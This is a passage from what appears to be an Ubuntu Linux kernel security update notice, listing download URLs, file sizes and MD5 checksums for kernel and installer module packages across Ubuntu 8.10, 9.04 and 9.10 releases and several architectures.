http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:   184054 488503b9f740847ceadce9ffecf619bb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:   157848 baa2be6c6cd11996db26cedd0ac6cf20
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:    34504 ac847847da2ecb11859b4f0a96527dfe
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:    78278 eecd9f3611c7b156ee20d3ba5ab2d149
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:    86192 1504465ed8849a5b8d4d6388b19324d5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:    51330 53afcbc4d209701220fdb808589c62f6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:     8798 35d104661e40cbd412298c6e90e81bf1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:    64328 9f5b81e91df8297bf40b0388f2af4041
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:   102108 49fb45b7254f059951ead5a5339c2ef7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:  1450218 78bcdd7f5f2f3223d11c97c1da4db5f7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:    44526 f2bac43d91e5e4a406130e969fbd3fea
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:    12640 076f896c619948cd532cd4add10c37b4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:   373184 f290323f15620846c5552c0134eabd7e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:   189718 00313ef10e965d88d39d00dc36a9d41c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb
  Size/MD5:    12986 9561f6dd8ce0995cee01cf9652d2e4b7

Updated packages for Ubuntu 9.04:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.60.diff.gz
  Size/MD5:  7397368 c8ad18574c31b7a63f6f5c7a60843164
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.60.dsc
  Size/MD5:     3175 2c4ae6fb41ce5c96725b9aba705987a0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28.orig.tar.gz
  Size/MD5: 66766084 062c29b626a55f09a65532538a6184d4

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.28_2.6.28-18.60_all.deb
  Size/MD5:  3637058 9dec78fd6960d3b0646d8f0dc72cc5e4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18_2.6.28-18.60_all.deb
  Size/MD5:  8701332 3ef361a5566e8345b3153dc68d9136f0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.28_2.6.28-18.60_all.deb
  Size/MD5: 57050918 907814e5a234539354a540f6489534cd

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb
  Size/MD5:   234604 53a2bff8a62ce01a44f0e00a308dbf1c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb
  Size/MD5:    44114 333413e67615ddeda779499ad9e4a43a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb
  Size/MD5:    43320 65a39dbb66ea99a5a79e3d5e1a346456
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb
  Size/MD5:    51122 988d9b26f215a72f808a224bc36a6e1c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb
  Size/MD5:    90090 30a652ac65d62e4155c83688402c8067
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb
  Size/MD5:    38016 332e9294ce3f61519dd5290ec635c24b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb
  Size/MD5:   521628 79ca320def43b0d474393ef7ab73aa88
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb
  Size/MD5:   125834 ddd3eb4fb0e0f172ece195c3a9476d40
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb
  Size/MD5:    58070 4d27a900d517cd310e6118466ed71bd4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb
  Size/MD5:   312518 1e1213e9da7c64d3234ef894e8041616
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb
  Size/MD5:  3870038 d659531b6f70c931945d661324479876
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.60_amd64.deb
  Size/MD5:   689366 06a5d59ba63c3e4657699434dfddaf31
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.60_amd64.deb
  Size/MD5:   689360 c5b01e691f1f85e7e011f5353c2e1f0e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.60_amd64.deb
  Size/MD5: 24340210 f6d36308201e439213d75fe89d1f949d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.60_amd64.deb
  Size/MD5: 24334604 22f99c6c0a710dd3d042e7a2e4265d4b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.60_amd64.deb
  Size/MD5: 10551528 e3393a5719e07dc10fd7e67caddd71ee
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.60_amd64.deb
  Size/MD5:   766410 b1b8ed1bf99588cd234faa8754331219
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb
  Size/MD5:   215198 bd56f1b146a6a266e7d33d479a56c3fd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb
  Size/MD5:   189504 56ec878057a6728811eb569171dd8989
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb
  Size/MD5:    29406 924bb46c31469545b2f9b5a69ecfd3c6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb
  Size/MD5:   274466 0d5c624d5fc036197f0b38346e7056bc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb
  Size/MD5:  1933830 9e64ca55e2b733384943bfda311e2cca
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb
  Size/MD5:   163478 7c8cdeafc20c3e2e55d4b6368ad348be
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb
  Size/MD5:   194832 95ad3c8c50998a0d57b97a426024d66b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb
  Size/MD5:   153012 6981c65957d83e2fc50e67b5feea37fc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb
  Size/MD5:    36500 e3ddd4487748944bb9e6af11197c452b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb
  Size/MD5:     5838 71b842fed3abfd0e10f45532e72e338a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb
  Size/MD5:    72156 6a4846b581e8073b594581393e7f3ea1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb
  Size/MD5:    22714 416a39e057492d674ab8fa69e92cc084
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb
  Size/MD5:     8874 ce3f11c073c3adc925e3586daaa3f256
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb
  Size/MD5:    47442 f4154e7a797bdb99243fb42b281e7dd0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb
  Size/MD5:    15658 4717f9a5625e9865d7770f16aa8b9694
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb
  Size/MD5:  1273644 885f048625f63743d42c7984e8f5465d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb
  Size/MD5:    47210 b4b171d4d29e8af25450868b0e5116b3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb
  Size/MD5:    72708 ff3985dfccb5b6b80cf3b9972ab682cf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb
  Size/MD5:   126984 91a505150c214b099359efeb3c533aa5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb
  Size/MD5:    13474 e2ad8b153b5e6c0d4f6a2727241d8ddb

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb
  Size/MD5:   215848 7e88186abd28ffb3e3654dd093004ae3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb
  Size/MD5:    46662 a154ceffcd9156175bfa3f9c986c366d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb
  Size/MD5:    41350 dd04211a0f405d7862c9089443302ac4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb
  Size/MD5:    47400 fa1dd350013b6876bc0d30034b4b7bd0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb
  Size/MD5:    86920 5c4e36161fe85f2a958857800e2e409c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb
  Size/MD5:    33574 dcfe6680ff2e6c726d97f8a70ab4d9d5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb
  Size/MD5:   525748 40b74d920dab9092817f7795442d6592
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb
  Size/MD5:   125626 eb07a73e676b56dd75596bd744e03792
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb
  Size/MD5:    54882 265f29c01ab8f188c84def410ebbc172
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb
  Size/MD5:   301356 3e7193de8da02b7b723c79445653c432
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb
  Size/MD5:  3745410 49dcbb598afe6e8912e888f53340f4b5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.60_i386.deb
  Size/MD5:   674134 d74071d14c2b5b9fc1c75e84d991dd71
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.60_i386.deb
  Size/MD5:   675796 149047440ae084feb9894d759c7b63aa
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.60_i386.deb
  Size/MD5: 24659518 575c49bf6d229bdd51f0701548e7f043
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.60_i386.deb
  Size/MD5: 24774746 3798a1951b896bbff4fc46c611292510
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.60_i386.deb
  Size/MD5: 10249078 15afc86c39ad73ab34b824eaa78ef4b0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.60_i386.deb
  Size/MD5:   766376 0d9edf49feedd8b599e2b30b2eb04c42
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb
  Size/MD5:   218104 9eec41a2e255bdd89fbf99e11487f8f1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb
  Size/MD5:   174930 4d40c9bb93f72fea91add90c7505e080
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb
  Size/MD5:    30058 5c81aa2bdefc2f94d3529ce108e8f746
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb
  Size/MD5:   262822 e5114f9458fe769969d45d81af460545
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb
  Size/MD5:  2109984 a44d3578f4ab6dbcaf93eb338c31b5de
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb
  Size/MD5:   150238 fde1cf1d54665b1152898d383b4fbd4a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb
  Size/MD5:   184330 f629a9074e10ea729bb40ed8bcfd016b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb
  Size/MD5:   143580 7357996698e948fb18cf9dc46eeece0b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb
  Size/MD5:    34576 7ba16717d6e47712637622673c90f3b0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb
  Size/MD5:     5502 b93b233830ad9076ceac6ee65dd77495
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb
  Size/MD5:    86008 202793c9a60b14b0da90e284858ee2d4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb
  Size/MD5:    47636 fe5142ee6e8661c795dea7642ebd69ef
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb
  Size/MD5:     8714 fc1cc26aa34730c3a5e8e6fb5ae284e4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb
  Size/MD5:    44694 c0227d7df6c44ff0b9b339bb0b8718f2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb
  Size/MD5:    14778 808796cd5c8f57330fd3fa0eea55de3c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb
  Size/MD5:  1445970 818de3e1c47c9c61fba615d83cee21db
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb
  Size/MD5:    44102 f7d8bdb504b89ed1f6f22cbb1c062a05
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb
  Size/MD5:    69286 1ae27dc724b0652b950ddd224e1462fb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb
  Size/MD5:   119534 bff6e2026e420dcb65a0225d2bdc0596
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb
  Size/MD5:    12668 c8201f92c0f347dc67007a23fe7fa011

lpia architecture (Low Power Intel Architecture):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb
  Size/MD5:   215256 f18473603a003ba28dd374ad628b484f
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb
  Size/MD5:    46660 914838556462e7f130e368b036f587bd
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb
  Size/MD5:    40958 2e3c304ba2a61195576580542c7df8a2
http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb
  Size/MD5:    47308 0a3192cc6c009326bdb9b2727f64c3df
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb
  Size/MD5:    86528 95187d7fe20c439b657b61973e0d8fc9
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb
  Size/MD5:    33268 77f1ec039ca977ef40cd817c6e55dd69
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb
  Size/MD5:   523810 2d09a40e8d569a6af434ab0df4800442
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb
  Size/MD5:   125262 2e02a3dc4688efebfca2df638db10001
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb
  Size/MD5:    63568 d5cfcc03460e7127851f936b4d960947
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb
  Size/MD5:   300744 11cc3d85f263b85b6e3de8200c5afeed
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb
  Size/MD5:  3036030 161110b4c0711adaa0a2ce65e4fa0179
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.28-18-lpia_2.6.28-18.60_lpia.deb
  Size/MD5:   641934 39f7b1d539afcb8df6f0a9a288337bf7
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.28-18-lpia_2.6.28-18.60_lpia.deb
  Size/MD5: 21801714 381e2a4a0ceb4dac21fc8536ca28c0ab
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.28-18.60_lpia.deb
  Size/MD5:   766398 622dbeb693c3f3e032645cb4e7403654
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb
  Size/MD5:   303984 361d4a5d1abaffcc970e7a7753aafb99
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb
  Size/MD5:   157422 bf9415a68244682147d6cf69cff06c8c
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb
  Size/MD5:    24446 48e686eba8b48e51cd6f8add61e30783
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb
  Size/MD5:   260420 d75b101a53850ec30fd987cc98b5dcfc
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb
  Size/MD5:  2027380 f7c86e961f136d8f7720606b07f42445
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb
  Size/MD5:   149404 a1ba79eddc8ec880b85f38acb9f4a169
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb
  Size/MD5:   184734 b9f553f43649b903d017b9ce996a477f
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb
  Size/MD5:   143250 87d9254ed1fd059143b903615afcdf05
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb
  Size/MD5:    34468 fae089aae953a5d621edff3acc40b920
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb
  Size/MD5:     5496 12aa2cd81eeb865d516ec72f965478dd
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb
  Size/MD5:    85656 4f0a903effc3fa9ee51940dee947d708
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb
  Size/MD5:    47412 1f2e8185757b3b615f667c9d68217e5a
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb
  Size/MD5:     8712 fb99f53e2c6b83696b6b073fba605430
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb
  Size/MD5:    63110 26c63b035a2d9927c14df6f1f12ec8db
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb
  Size/MD5:    14720 20a7c8f7ebd43a137ea7b41a1630f139
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb
  Size/MD5:  1447856 76bcfc8feb47f5ac5563af20bfc99c9e
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb
  Size/MD5:    43894 d0889b8353438c679226440a3cd8adf0
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb
  Size/MD5:   155186 9c4ca527436faae3e26d5ddfc84483c7
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb
  Size/MD5:   172668 de043f2370a2d9df8302df49630496ae
http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb
  Size/MD5:     8156 46a66e91cb7385b4b9b29dac39afc4a5

Updated packages for Ubuntu 9.10:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-305.13.diff.gz
  Size/MD5:  9231427 c3f53b69a361314d42ce3d6e259f2503
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-305.13.dsc
  Size/MD5:     2706 b4ee26ab32d83270e4e1360f3e17c9ab
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31.orig.tar.gz
  Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-109.25.diff.gz
  Size/MD5:  3971656 b2857f67cd49a8cd59c3aeb7d94ac5a2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-109.25.dsc
  Size/MD5:     2180 3d2e087aeefb5fe483686bd47503d8a5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31.orig.tar.gz
  Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-212.26.diff.gz
  Size/MD5:  4575980 43940153bf9f4140ae4572da20a9e49d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-212.26.dsc
  Size/MD5:     2214 3ce25d640b5d021c0b60d9a6f1cafb0c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31.orig.tar.gz
  Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-20.58.diff.gz
  Size/MD5:  2931833 6676c1d226d154894c430a852bd5a7c9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-20.58.dsc
  Size/MD5:     3782 027bb2d47b20e462a45edd918d0779ba
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31.orig.tar.gz
  Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-doc_2.6.31-305.13_all.deb
  Size/MD5:  3797952 6d464b3c3a1635718d9ccffd2a20d9e1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-source-2.6.31_2.6.31-305.13_all.deb
  Size/MD5: 64265774 835e6053c071fa1010b92d50b2762f91
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-305_2.6.31-305.13_all.deb
  Size/MD5:  9671634 2f6bb2d690e5d9522458ce136845e309
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc_2.6.31-20.58_all.deb
  Size/MD5:  3799562 2f43b06ccc01383a4f598751e6ba32a9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-20_2.6.31-20.58_all.deb
  Size/MD5:  9539956 1d7d2889058126b51e55f0a3f2df5a94
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.31_2.6.31-20.58_all.deb
  Size/MD5: 62184514 6dd23fd6f2f621bb95b434bf9e824fc6

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-305-ec2_2.6.31-305.13_amd64.deb
  Size/MD5:   610244 0be9491b665967ea838131d028275da4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-305-ec2_2.6.31-305.13_amd64.deb
  Size/MD5: 18763958 54754b35233eb07e6de3e6e44ecaa9a4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:   221432 da929164131e9c8177f81276b9e8b868
http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:    15642 407a7a2d9ba01bd8b4567963fd256c5d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:    52132 c961c35a3d22be161e13cdf8ba799c3b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb
  Size/MD5:    44832 ca1169011b27bacd52a727607f36fd73
